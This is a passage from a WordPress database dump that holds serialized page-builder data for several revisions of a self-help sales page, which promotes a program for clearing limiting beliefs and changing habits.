Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:3:{s:3:"src";s:79:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:159:"<div class="parg-text"><p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"1";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:482:"<div class="parg-text"><p><strong>We literally <u>create our reality</u> with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:3:{s:3:"src";s:64:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"1";s:2:"id";s:2:"21";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:17:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"2";}i:15;a:1:{s:5:"cells";s:1:"2";}i:16;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:25:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"14";}i:22;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"15";}i:23;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"15";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}}}'),
(1538, 1979, 'panels_data', 'a:3:{s:7:"widgets";a:22:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:16:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:22:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}}}'),
(1539, 1980, 'panels_data', 'a:3:{s:7:"widgets";a:23:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your 